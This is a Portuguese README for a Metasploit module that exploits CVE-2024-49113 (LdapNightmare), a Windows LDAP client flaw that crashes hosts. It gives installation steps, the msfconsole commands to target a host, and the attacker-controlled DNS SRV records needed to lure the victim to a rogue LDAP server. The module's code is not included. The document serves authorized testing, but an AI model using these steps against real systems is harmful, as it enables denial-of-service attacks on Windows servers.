
SafeBreaches CVE-2024-49113 POC(LdapNightmare) Integrado ao Metasploit
SafeBreaches CVE-2024-49113 POC (LdapNightmare) Integrado ao Metasploit
Este módulo implementa o CVE-2024-49113, uma vulnerabilidade crítica no cliente LDAP do Windows que pode causar instabilidade no sistema. O módulo integra-se ao Metasploit Framework, fornecendo uma maneira confiável de testar a resiliência do sistema contra essa vulnerabilidade.
ldaptor
impacket
Instale os pacotes Python necessários:
pip install -r requirements.txt
Coloque o módulo no diretório de módulos do Metasploit:
cp ldapnightmare.py /path/to/metasploit/modules/auxiliary/dos/windows/ldap/
Certifique-se de que o módulo é executável:
chmod +x ldapnightmare.py
Inicie o msfconsole:
msfconsole
Carregue e configure o módulo:
use auxiliary/dos/windows/ldap/ldapnightmare
set RHOSTS target_ip
set RPORT 49664
set LPORT 389
set DOMAINNAME yourdomain.com
run
RHOSTS - Endereço alvo (obrigatório)RPORT - Porta alvo para RPC (padrão: 49664)LPORT - Porta local para o servidor LDAP (padrão: 389)DOMAINNAME - Nome de domínio do atacante (obrigatório). Este domínio deve ter registros DNS SRV específicos configurados (veja Configuração de Domínio abaixo)ACCOUNT - Nome da conta alvo (padrão: Administrator)SITENAME - Nome do site alvo (padrão: vazio)O parâmetro DOMAINNAME requer que registros DNS SRV específicos sejam configurados. O domínio deve ter dois registros SRV abaixo dele:
ldap.tcp.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameldap.tcp.default-first-site-name._sites.dc._msdcs.domain_name → listen_port attacker's_machine_hostnameNota Importante: O nome do host da máquina do atacante funcionará apenas se o servidor vítima conseguir resolvê-lo usando NBNS. Alternativamente, você pode substituir o nome do host por um nome de domínio que aponte para o endereço IP do seu servidor LDAP.
O módulo opera em três estágios principais:
Este módulo é destinado apenas para testes de segurança autorizados e fins de pesquisa. Os usuários devem obter autorização adequada antes de testar qualquer sistema que não possuam ou não tenham permissão para testar.
Este módulo é lançado sob a Licença BSD 3-Cláusula.
Este trabalho contém código derivado de:
Os textos completos das licenças podem ser encontrados no arquivo LICENSES.